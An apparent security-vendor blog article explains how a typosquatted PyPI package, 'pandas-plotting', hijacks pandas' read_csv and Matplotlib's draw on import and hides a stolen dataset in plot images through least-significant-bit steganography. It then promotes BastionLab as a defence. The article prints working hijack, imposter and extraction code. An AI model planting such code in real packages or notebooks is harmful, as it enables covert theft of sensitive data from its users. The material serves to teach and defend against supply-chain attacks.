How Python Data Science Libraries Can Be Hijacked (and What You Can Do About It)
Hackers can easily hijack the data science libraries you use every day and get full access to the datasets you are working with. Data owners need tools to prevent it from happening.
Every day, a data scientist somewhere calls a common data science function, passing it a raw dataset in full. We do this without a second thought: we know these libraries well, and they come from reputable sources… What could go wrong?
While the sources behind these libraries may be trustworthy themselves, Python packages are vulnerable to code injections. Hackers can easily hijack them, meaning that when you call your usual data science functions, you could be giving external parties unrestricted access to your datasets.
In this article, we are going to show you exactly how a malicious data scientist could use a poisoned dependency to hijack your libraries - and what you can do to protect your data!
In a Nutshell:
1. Python packages used in data science can be vulnerable to code injections, allowing hackers to hijack them and gain unrestricted access to datasets.
2. The attack described in this article involves a malicious PyPI package called 'pandas-plotting' that disguises itself as a legitimate package by borrowing the name of a common data science library.
3. BastionLab ensures that data scientists cannot access the full dataset, and manipulations happen on the server side, complying with the defined security policies.
The Attack Begins
Let’s imagine you are a data owner in possession of a sensitive health dataset. You have contracted an external data scientist to provide valuable insights into your data. The process goes smoothly: the data scientist shares a Jupyter notebook with you through Google Colab, a practical tool you trust to do all this remotely. You check their code thoroughly to ensure it is safe before running it: it seems to use only common Python data science functions, like Matplotlib plotting functions, and to import trusted packages, like ‘pandas’, and you don’t notice any suspicious commands. You run the code, see the expected outputs, and send the results back to the data scientist. Done.
Spoiler alert: you’ve been hacked.
Malicious code was hidden inside one of the PyPI packages: ‘pandas-plotting’ (a package we created for this article). You didn’t notice it because its name deliberately contains the name of the common data science library ‘pandas’, to disguise it as a legitimate package.
From there onwards, the process is quite cunning, as it exploits a feature of Python: as soon as you import a package, the code in its __init__.py file is executed without notifying you. Usually, this file contains the code needed to set up the package’s submodules, but in the case of our attack, it contains code that hijacks other libraries' functions. Unaware that your trusted libraries' functions had been intercepted, you actually handed a full copy of the raw data to the so-called data scientist when you sent back the results…
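To make the mechanism concrete, here is a minimal sketch of what such a malicious __init__.py could look like. The hijack_fn helper and the imposter read_csv and draw functions are the ones detailed later in this article; the submodule names we import them from are purely illustrative.

```python
# pandas_plotting/__init__.py - simplified sketch of the malicious package's
# init file (our illustration; the real package's internal layout may differ)
import pandas as pd
from matplotlib.backends.backend_agg import FigureCanvasAgg

# `hijack_fn` and the imposter `read_csv` / `draw` functions are shown later
# in this article; here we assume they live in hypothetical submodules
from .hijacking import hijack_fn
from .imposters import read_csv, draw

# This runs as soon as someone does `import pandas_plotting`:
# the trusted functions are silently rerouted to the imposters
hijack_fn(pd, "read_csv", read_csv)
hijack_fn(FigureCanvasAgg, "draw", draw)
```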
For educational purposes, let’s now break the attack down into three stages: the functions are hijacked, the dataset is stolen, and the attacker retrieves the data.
Stage One: Functions Are Hijacked
The attack started when we imported the pandas-plotting package. It executed code that replaced the original function with a malicious one. Much like redirecting mail, the malicious data scientist changed where pandas’ read_csv() name points, so that any call to the original function now lands on the fake one.
Function names and location pre-hijacking:
| Function name in the local scope | Original function | Location in memory |
|---|---|---|
| read_csv | read_csv | 0x7f81edc49d80 |
| fake_csv | fake_csv | 0x7f81eca42d40 |
Function names and location post-hijacking:
| Function name in the local scope | Original function | Location in memory |
|---|---|---|
| read_csv | fake_csv | 0x7f81eca42d40 |
| fake_csv | fake_csv | 0x7f81eca42d40 |
Surely, changing the underlying function that gets called when we use a function’s name must be really complicated, right?
Actually, no. It can even be achieved with exactly one line of code! But before we go over that depressing piece of news, let’s see how Python works so we understand fully why it could be so easy to leak all our datasets.
- When you download a package in Python, you get a local copy of all of the package’s files.
- When you import the same package, Python will search for it locally and tie the results of that search to a name in the local scope.
- The package becomes an object in your local scope. This means that its functions become attributes of that object.
- Now for the key information: the built-in Python functions getattr() and setattr() allow you to get and modify any object’s attributes - including, here, the functions of the imported library!
And that’s how the malicious data scientist was able to “hijack” your functions. First, they used getattr() to store a reference to the original function under a new name.
Keeping this reference lets the imposter function call the original one, run the malicious code that steals the dataset, and then hand you back the genuine results - so you never spot the attack through unexpected return values.
```python
import pandas

# Save the read_csv function under the 'original_read_csv' alias
original_read_csv = getattr(pandas, "read_csv")

# original_read_csv can now be used exactly as pandas.read_csv() would be
dataframe = original_read_csv("covid.csv")
```
Then the attacker used setattr(). They provided it with three arguments: the object being targeted (the imported library), the name of the function they wanted to replace, and the new function to put in its place.
```python
import pandas

# Rebind pandas' read_csv name to the attacker's fake_csv function
setattr(pandas, "read_csv", fake_csv)
```
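If you want to see this “mail redirection” for yourself, you can print each function’s memory address before and after the swap - roughly how the address tables above could be reproduced. In this sketch, fake_csv is just an illustrative stand-in for the attacker’s imposter function.

```python
import pandas

def fake_csv(*args, **kwargs):
    # Stand-in for the attacker's imposter function (illustrative only)
    print("stealing your data here...")

print(hex(id(pandas.read_csv)))   # e.g. 0x7f81edc49d80 -> the genuine read_csv
print(hex(id(fake_csv)))          # e.g. 0x7f81eca42d40 -> the fake

setattr(pandas, "read_csv", fake_csv)

# After the swap, the name `pandas.read_csv` points at the fake function
print(pandas.read_csv is fake_csv)   # True
print(hex(id(pandas.read_csv)))      # same address as fake_csv
```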
Now that we’ve seen how getattr() and setattr() work, let’s take a look at how they were used to hijack pandas’ read_csv() function.
We have added comments (#) to guide you through the code.
```python
# Hijacking the function
# `obj`    -> the imported library object being targeted
# `name`   -> name of the function that's being hijacked
# `new_fn` -> the new function that will be tied to the original function's name
def hijack_fn(obj, name, new_fn):
    # Getting the original function from the imported library object
    original = getattr(obj, name)
    # Storing a copy of the original function in an `_original` attribute
    # of the new function
    new_fn._original = original
    # Rebinding the name so it now points to the new function
    setattr(obj, name, new_fn)

# Importing the pandas library under the 'pd' alias
import pandas as pd

# Using the hijack function so that calls to `pd.read_csv` now land on
# the attacker's own `read_csv` imposter function
hijack_fn(pd, "read_csv", read_csv)
```
Your functions were hijacked without you noticing, and it only required a few lines of code. Now let’s take a look at how your dataset was stolen once you called the now-hijacked read_csv() function.
Stage Two: The Data Is Stolen
In most cases, data science starts with creating a data frame of the dataset. Accordingly, one of the first functions to be called and executed after importing dependencies at the top of the file (including our malicious pandas-plotting package) is read_csv():
```python
df = pd.read_csv("covid_data.csv")
```
Since the code executed by __init__.py has tied the original ‘read_csv’ name to the new malicious function, it is pandas-plotting’s function that will now be called. It is defined as follows:
```python
# `pandas-plotting`'s imposter `read_csv` function
# It uses generic *args and **kwargs arguments to collect any input that was
# intended for pandas' `read_csv` function
def read_csv(*args, **kwargs):
    # `_original` is where a copy of the original `read_csv` function was
    # stored when the hijacking function was called
    original_func = read_csv._original
    # The return value from the original function is set aside
    ret = original_func(*args, **kwargs)
    # A copy of the return value - a pandas dataframe containing all the data
    # from the csv file - is stored in the `_stolen` attribute
    read_csv._stolen = ret.copy()
    # The original function's return value is forwarded back to the user
    return ret
```
By making what appears to be a harmless call to read_csv(), a secret copy of your data has been created without your knowledge. But this is just the start of your troubles: next up, we are going to see how the hacker was able to trick you into sharing this stolen dataset with them by hiding it in an image.
Stage Three: The Attacker Recovers the Dataset
Up until this point, we have only mentioned one function being hijacked in the code executed by __init__.py upon import, but a second function was targeted too: Matplotlib’s draw() function (more precisely, the draw() method of the FigureCanvasAgg backend).
Matplotlib is a common data science library used to plot data, and its draw function redraws a plot after any update. It is called under the hood by Matplotlib’s plotting functions, like bar(), which creates bar plots.
```python
# Importing the matplotlib backend class whose draw method will be hijacked
from matplotlib.backends.backend_agg import FigureCanvasAgg

# pandas-plotting replaces this method with its own imposter draw function
hijack_fn(FigureCanvasAgg, "draw", draw)
```
Matplotlib’s draw() function was hijacked when we imported pandas-plotting and was replaced with an imposter draw function. The malicious code takes inspiration from steganography principles, where information is hidden in plain sight by concealing it within another message or physical object. It hid the dataset previously stolen by the read_csv() imposter function within an image… And not just any image! The dataset was hidden in the plot the user expected to be created by the original draw() function (or, more precisely, the bar() plotting function, which makes use of draw()).
But how can you put a dataset into an image?
With the help of existing open-source steganography functions, it’s actually not so hard!
Using one of them, the attacker was able to hide the dataset in an image that cannot be distinguished from the original with the naked eye, because the data is encoded in the image’s "least significant bits." The dataset can then be decoded and recovered relatively easily using the same open-source library (LSBSteg).
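To give an idea of the principle (a minimal, hand-rolled sketch, independent of the LSBSteg library the attacker actually uses): one byte can be spread over the lowest bit of eight pixel values without any visible change to the image.

```python
import numpy as np

def hide_byte(pixels: np.ndarray, byte: int) -> np.ndarray:
    """Hide one byte in the least significant bits of eight pixel values."""
    bits = [(byte >> i) & 1 for i in range(8)]        # the byte, bit by bit
    hidden = pixels.copy()
    for i, bit in enumerate(bits):
        hidden[i] = (hidden[i] & 0b11111110) | bit    # overwrite only the lowest bit
    return hidden

def recover_byte(pixels: np.ndarray) -> int:
    """Read the byte back out of the least significant bits."""
    return sum((int(pixels[i]) & 1) << i for i in range(8))

pixels = np.array([200, 13, 77, 154, 9, 255, 42, 128], dtype=np.uint8)
stego = hide_byte(pixels, ord("A"))
print(stego)                       # differs from `pixels` by at most 1 per value
print(chr(recover_byte(stego)))    # 'A'
```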
When you executed the code to generate a barplot of the 10 states in the US with the highest COVID deaths:
```python
import matplotlib.pyplot as plt

# Get the 10 states in the US with the highest Covid deaths
top10 = df.groupby("Province/State").sum()
top10 = top10.sort_values("Deaths", ascending=False)
top10 = top10.head(10)

# Create a bar plot of this data
plt.title("Most cases of covid per province/state")
plt.bar(top10.index, top10["Deaths"])  # bar() uses the draw function to generate the plot
plt.show()
```
You produced the following plot:
It looked as expected, so you saved the image and shared it with the external data scientist - unaware there was an extractable copy of your raw data within the image. You might even have gone on to share it publicly!
We made a Google Colab notebook to show you how the attacker would extract the dataset from this image, thanks to a steganography library available on GitHub (you can test it yourself to realize how easy that is).
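For a rough idea of what that extraction step looks like, here is a sketch assuming the LSBSteg class from that library and the Parquet encoding used by the imposter functions (the image filename is purely illustrative):

```python
import io

import cv2
import pandas as pd
from LSBSteg import LSBSteg  # class from the open-source steganography library

# Load the plot image the data owner shared (hypothetical filename)
image = cv2.imread("covid_barplot.png")

# Decode the bytes hidden in the image's least significant bits
hidden_bytes = LSBSteg(image).decode_binary()

# Those bytes are the Parquet-encoded dataframe stolen by the imposter
# read_csv() function - read it straight back into pandas
stolen_df = pd.read_parquet(io.BytesIO(hidden_bytes))
print(stolen_df.head())
```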
Let’s finish off this section by providing you with the full imposter draw code:
```python
# Imposter draw function
def draw(*attr, **kwargs):
    # The original draw function was saved into an `_original` attribute when
    # the hijack function was called; we retrieve it here
    original_func = draw._original
    # The original function is called and its return value stored
    return_val = original_func(*attr, **kwargs)
    # If there is a stolen dataset saved
    if hasattr(read_csv, "_stolen") and isinstance(read_csv._stolen, pd.DataFrame):
        # Importing the library needed to build an in-memory bytes buffer
        import io
        # Bytes object that will hold the stolen data once converted to binary
        byt = io.BytesIO()
        # Pandas' `to_parquet()` function converts the dataframe to binary
        # parquet form and stores it in the bytes object
        read_csv._stolen.head(500).to_parquet(byt)
        # attr[0] is the matplotlib canvas that has just been updated by the
        # call to the original draw function; buffer_rgba() converts it to a
        # buffer of RGBA pixel values
        buf = attr[0].renderer.buffer_rgba()
        # Instantiates LSBSteg (the open-source class that will let the attacker
        # extract the data later) with the plot image as an RGBA buffer
        lsbsteg = LSBSteg(buf)
        # Passes the dataframe in binary form to LSBSteg's encoding function,
        # which encodes it into the least significant bits of the plot image
        lsbsteg.encode_binary(byt.getvalue())
    # Returns the original draw function's return value
    return return_val
```
How can you protect your data?
This attack relies on two issues: an insecure collaborative workflow and raw data being supplied to functions that could be hijacked by malicious actors.
There aren’t many tools yet that help with those specific issues. This is why we built BastionLab, a privacy framework for data science collaboration. Its features, which cover data exploration and AI training, were designed to mitigate both of those vulnerabilities.
- First, the data owner defines a privacy policy and uploads their dataset to BastionLab’s server. The policy grants third parties customizable levels of access to the data. Our default policy ensures datasets can never be extracted in full, because we check that query results are sufficiently aggregated to guarantee anonymity.
- Then, data scientists can remotely access the privacy-protected dataset. Any request that would breach the data owner’s privacy policy will either be denied or left pending the data owner’s approval. Data scientists can also only execute a limited set of data science functions, which prevents code injections.
This measure means that even if BastionLab’s client was hijacked, there is no way to access the data with rogue client actions or functions. Data scientists never manipulate the dataset locally: the data doesn't leave the server unless it complies with the security policy in place.
These safeguards keep data collaboration private while mitigating the risks that arise from the usual collaborative workflows!
Ready to Try BastionLab?
Get introduced in our Quick tour, which shows how the Titanic dataset can be shared with a remote data scientist while ensuring only anonymized results about the passengers aboard the ship are communicated. We also have a more realistic example using a COVID dataset.
For now, BastionLab works with simple scenarios, but we have many plans for it in the future - coming soon, Differential Privacy! We are open-source, so you can check our code online and help us make it as easy to use and safe as possible.
If you are interested, drop a star on GitHub, and join us on our Discord. We're always very happy to hear your feedback!